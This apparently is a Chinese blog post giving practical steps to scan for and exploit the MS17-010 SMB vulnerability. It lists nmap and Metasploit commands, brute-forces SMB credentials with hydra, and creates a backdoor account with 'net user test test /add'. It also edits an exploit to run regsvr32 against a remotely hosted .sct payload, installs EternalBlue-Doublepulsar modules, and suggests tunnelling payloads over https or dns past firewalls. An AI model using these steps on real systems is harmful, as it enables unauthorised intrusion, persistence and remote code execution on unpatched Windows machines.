ms17-010 php版本,那年MS17-010
扫描脚本汇总
PHP脚本:
批量扫描:
MSF的:
或者也可以:
smb_ms17_010.rb缺省只扫445/TCP。如果想扫139/TCP,必须:
set SMBDirect false
set RPORT 139
或者
unset SMBDirect
set RPORT 139
NMAP的:
nmap --script smb-vuln-ms17-010 -p445 x.x.x.x
漏洞利用
worawit/MS17-010
https://github.com/worawit/MS17-010
这个脚本其实在nas放出一个月就公开再Exploit-db了,很多人估计都不知道..
那么,查看zzz_exploit.py脚本会看到 from mysmb import MYSMB 之前有人使用python钓鱼:mysmb,其实真正安装了这个模块的人其实这个脚本反倒会利用失败.并且把信息发送给钓鱼者
依赖项
pipe
经常执行脚本会发现报错.如下所示
你可能需要的pipe
那么直接通过 python zzz_exploit.py [pipe_name] 即可
当然有些时候没有设置username和password,并且共享中启动了密码访问..也会导致这个问题
或者可以通过
auxiliary/scanner/smb/pipe_auditor 模块找寻你需要的pipe
username and password
USERNAME = ''
PASSWORD = ''
只需要更改系统中存在的共享smb账户,无论权限多低
那么我们怎么找到对应的账户呢,使用如下两种,当然使用自己写python脚本更佳啊
hydra -L user.txt -P pass.txt -t 20 10.10.10.10 smb
注意: 此脚本最关键地方
如果测试成功,会发现c盘新建了一个pwned.txt文件,同时会执行命令net user test test /add
如果觉得繁琐,可以用powershell/regsvr32等等执行脚本内容
在python代码更改成如下即可
service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll')
Eternalblue-Doublepulsar-Metasploit
修改eternalblue_doublepulsar.rb中成自己的目录,修改完成后,我们将rb文件放到metasploit的目录exploit/windows/smb/
启动msf后使用reload_all命令重新加载模块
ms17_010_eternalblue
至于防火墙可以通过https和dns的payload走就行了
ms17_010_psexec
全版本通杀,至于为什么.因为有依赖条件.必须是禁止密码保护共享的
本文参考此文整理
ms17-010 php版本,那年MS17-010相关推荐
- 16进制 转为图片 php_十六进制编辑器(010 Editor)官方版下载_十六进制编辑器(010 Editor) v11.0中文汉化版64位...
010 Editor是一款专业的文本编辑器和十六进制编辑器,它可以编辑文本文件,包括 Uni code 文件.批处理文件.C/C++.XML 等,功能全面且强大,可以说是目前最强大的十六进制编辑器了. ...
- Libvirt 版本降级过程记录 4.5.0 to 3.9.0
前言 搞 OpenStack 开发 Libvirt 版本会随着 OpenStack 版本切来切去的,记录一下 Libvirt 从 4.5 降级到 3.9.0 的过程. 步骤 直接 downgrade ...
- # Linkage Mapper 版本及下载
# Linkage Mapper 版本及下载 Linkage Mapper 从2009年到现在更新了多个版本,不同版本搭配不同的ArcGIS版本使用,最新的ArcGIS 10.0-10.6版本使用 ...
- Linkage Mapper 版本及下载
Linkage Mapper 版本及下载 Linkage Mapper 从2009年到现在更新了多个版本,不同版本搭配不同的ArcGIS版本使用,最新的ArcGIS 10.0-10.6版本使用 Lin ...
- 无符号数计算非零比特数量的多种版本C代码汇总
本文首先基于http://www.cnblogs.com/graphics/archive/2010/06/21/1752421.html这篇博文,并在此基础上增加了一个方法. 问题描述 任意给定一个 ...
- 剑指offer 二进制1中的个数
算法-求二进制数中1的个数 问题描述 任意给定一个32位无符号整数n,求n的二进制表示中1的个数,比如n = 5(0101)时,返回2,n = 15(1111)时,返回4 这也是一道比较经典的题目了, ...
- python字符串打印教学_python字符串格式化教你正确打印 : D
python字符串格式化教你正确打印 : D python字符串格式化教你正确打印 : D 文章目录 用格式字符% 字符串 整数 浮点数 format格式化 print需要注意的地方 转义字符 %运算 ...
- python语言及其应用-Python语言及其应用.PDF
Python语言及其应用.PDF 图灵程序设计丛书 Python 语言及其应用 Introducing Python [美]Bill Lubanovic 著 丁嘉瑞 梁杰 禹常隆 译 Beijing ...
- Kafka消息格式中的变长字段(Varints)
欢迎支持笔者新作:<深入理解Kafka:核心设计与实践原理>和<RabbitMQ实战指南>,同时欢迎关注笔者的微信公众号:朱小厮的博客. 欢迎跳转到本文的原文链接:https: ...
最新文章
- 对人脑而言,阅读计算机代码和阅读语言有何不同?
- 【转】最佳 WordPress 缓存插件:WP Super Cache
- 贼好用的Java工具类库,GitHub星标10k+,你在用吗?
- php bmp中创建图像bmp2gd,让GD支持32位BMP
- 你要的六级成绩批量查询,它来啦......
- Spring框架中constructor-arg与property理解
- 运输层_TCP可靠传输的实现
- 常用的html语言,常用的HTML语言标记
- 还在忍受磁力搜索网站不忍直视的广告么?18年最新最好用的bt磁力搜索网站介绍
- WPS for Linux添加字体
- 如何下载网页中的视频成mp4格式
- Oracle Comment添加表备注和列备注添加和查询comment on table or culumn
- HTML网页设计期末课程大作业 ~中国茶文化5页面带轮播(HTML+CSS+JS)~ 学生网页设计作业源码...
- 快乐共享(By Robinvane Suen)
- UE5回合制游戏【2-摄像机控制】(蓝图版)
- 8.微信小程序-Mobx数据共享(类似vuex)
- 微信的根服务器在哪国,为何很多人把微信上的国家设置成安道尔?安道尔在哪里?...
- 学习记录(Day2)
- 共享内存(shmget,shmat,shmdt,shmctl)
- 【单片机基础】ADC0832详解